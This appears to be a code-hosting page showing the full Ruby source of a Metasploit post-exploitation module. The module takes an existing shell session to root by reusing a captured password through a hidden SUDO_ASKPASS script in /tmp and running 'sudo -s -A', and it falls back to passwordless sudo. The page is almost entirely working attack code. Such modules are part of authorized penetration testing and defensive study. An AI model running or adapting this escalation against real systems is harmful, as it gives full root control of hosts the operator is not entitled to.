Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/multi/manage/sudo.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::Priv8include Msf::Post::Linux::System9include Msf::Exploit::FileDropper1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Multiple Linux / Unix Post Sudo Upgrade Shell',16'Description' => %q{17This module attempts to upgrade a shell account to UID 0 by reusing the18given password and passing it to sudo. This technique relies on sudo19versions from 2008 and later which support -A.20},21'License' => MSF_LICENSE,22'Author' => [23'todb <todb[at]metasploit.com>',24'Ryan Baxendale <rbaxendale[at]gmail.com>' # added password option25],26'Platform' => %w[aix linux osx solaris unix],27'References' => [28# Askpass first added March 2, 2008, looks like29[ 'URL', 'http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h']30],31'SessionTypes' => [ 'shell' ]32)33) # Need to test 'meterpreter'3435register_options(36[37OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])38]39)40end4142# Run Method for when run command is issued43def run44if session.type == 'meterpreter'45fail_with(Failure::BadConfig, 'Meterpreter sessions cannot be elevated with sudo')46end4748print_status('SUDO: Attempting to upgrade to UID 0 via sudo')49sudo_bin = cmd_exec('which sudo')50if is_root?51print_status 'Already root, so no need to upgrade permissions. Aborting.'52return53end54if sudo_bin.empty?55print_error 'No sudo binary available. Aborting.'56return57end58get_root59end6061def get_root62password = datastore['PASSWORD'] || session.exploit_datastore['PASSWORD']6364if password.to_s.empty?65print_status 'No password available, trying a passwordless sudo.'66else67print_status "Sudoing with password `#{password}'."68end69askpass_sudo(password)70if is_root?71print_good 'SUDO: Root shell secured.'72report_note(73host: session,74type: 'host.escalation',75data: "User `#{session.exploit_datastore['USERNAME']}' sudo'ed to a root shell"76)77else78print_error "SUDO: Didn't work out, still a mere user."79end80end8182# TODO: test on more platforms83def askpass_sudo(password)84if password.to_s.empty?85begin86::Timeout.timeout(30) do87cmd_exec('sudo -s')88end89rescue ::Timeout::Error90print_error 'SUDO: Passwordless sudo timed out. Might be blocking.'91rescue StandardError92print_error 'SUDO: Passwordless sudo failed. Check the session log.'93end94else95askpass_sh = '/tmp/.' + Rex::Text.rand_text_alpha(7)96begin97# Telnet can be pretty pokey, allow about 20 seconds per cmd_exec98# Generally will be much snappier over ssh.99# Need to timeout in case there's a blocking prompt after all100::Timeout.timeout(120) do101# Create the shell script that will pass the password to sudo102vprint_status "Writing the SUDO_ASKPASS script: #{askpass_sh}"103write_file(askpass_sh, "#!/bin/sh\necho '#{password}'\n")104register_file_for_cleanup(askpass_sh)105vprint_status 'Setting executable bit.'106cmd_exec("chmod +x #{askpass_sh}")107vprint_status 'Setting environment variable.'108109# Bruteforce the set command. At least one should work.110cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}")111cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")112vprint_status 'Executing sudo -s -A'113cmd_exec('sudo -s -A')114end115rescue ::Timeout::Error116print_error 'SUDO: Sudo with a password timed out.'117rescue StandardError118print_error 'SUDO: Sudo with a password failed. Check the session log.'119end120end121end122end123124125